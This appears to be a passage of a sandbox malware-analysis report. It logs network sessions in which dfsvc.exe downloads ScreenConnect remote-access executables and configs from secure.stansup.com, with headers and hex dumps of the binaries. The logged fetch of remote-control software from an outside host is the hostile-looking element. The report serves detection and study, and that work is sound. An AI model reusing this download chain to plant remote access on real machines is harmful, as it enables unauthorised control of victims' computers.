                                                                                                                                                                                                                                                        2024-10-25 17:27:25 UTC1689INData Raw: 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55 30 2f 45 70 46 32 33 72 39
                                                                                                                                                                                                                                                        Data Ascii: ufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU0/EpF23r9


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        2192.168.2.114978479.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:30 UTC126OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:31 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 95520
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:30 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:31 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                                                                        2024-10-25 17:27:31 UTC16384INData Raw: 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00 8b
                                                                                                                                                                                                                                                        Data Ascii: t@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                                                                                                                        2024-10-25 17:27:31 UTC16384INData Raw: 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b 86
                                                                                                                                                                                                                                                        Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                                                                                                                        2024-10-25 17:27:31 UTC16384INData Raw: 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39 50
                                                                                                                                                                                                                                                        Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9P
                                                                                                                                                                                                                                                        2024-10-25 17:27:31 UTC16384INData Raw: 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: e-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                                                                                                        2024-10-25 17:27:31 UTC13815INData Raw: 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b 37
                                                                                                                                                                                                                                                        Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;7


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        3192.168.2.114979679.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:32 UTC134OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:33 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 61216
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:32 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:33 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 50 0f bc 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 7f 7c 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0 @ |@
                                                                                                                                                                                                                                                        2024-10-25 17:27:33 UTC16384INData Raw: 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19 06
                                                                                                                                                                                                                                                        Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
                                                                                                                                                                                                                                                        2024-10-25 17:27:33 UTC16384INData Raw: 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00 54
                                                                                                                                                                                                                                                        Data Ascii: hresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_ItemT
                                                                                                                                                                                                                                                        2024-10-25 17:27:33 UTC12279INData Raw: 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3c 00 0c 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 33 00 2e 00 38 00 39 00 33 00 36 00 00 00 40 00 0c 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 33 00 2e 00 38 00 39 00 33 00 36 00 00 00 30 e4 00 00 ea 01 00 00
                                                                                                                                                                                                                                                        Data Ascii: nect.WindowsBackstageShell.exe<ProductNameScreenConnect<ProductVersion24.2.3.8936@Assembly Version24.2.3.89360


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        4192.168.2.114980879.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:34 UTC138OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:34 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:34 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:34 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        5192.168.2.114981779.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:35 UTC109OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:35 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:35 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:35 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        6192.168.2.114982479.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:36 UTC117OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:36 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:36 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:36 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        7192.168.2.114983479.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:37 UTC107OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:38 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 81696
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:38 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:38 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 9c 58 f1 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 96 ab 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELzX"0@^ `@ `@
                                                                                                                                                                                                                                                        2024-10-25 17:27:38 UTC16384INData Raw: 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 3c 7d b5 15 e6 e4 47 39 a8 2f df 51 21 71 d1 7d 7c b4 23 ff 20 aa 00 bc c6 ea 30 f6 ac ab 55 7c cb 13 b1 66 bd 7a 69 bd d1 74 04 f3 9e 32 ae b2 e1 88 de 6c a2 e7 df 05 2c 86 6e 6d 86 5d ac ab b4 f5 fc e8 bf af d9 ab 77 e1 9c 9d 9d 47 f8 bc 1f 97 32 ee 22 45 7e 53 a9 85 d4 74 40 81 47 46 8a 90 dd d2 c3 e6 60 69 82 ec 5a 08 9c b2 91 6b 34 e0 d0 8f ba 84 fe 4b 55 db 67 ae 56 73 fe 12 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34 07
                                                                                                                                                                                                                                                        Data Ascii: 452b-8975-74a85828d354TextState<}G9/Q!q}|# 0U|fzit2l,nm]wG2"E~St@GF`iZk4KUgVs{^@RSDSL[M9iHF4
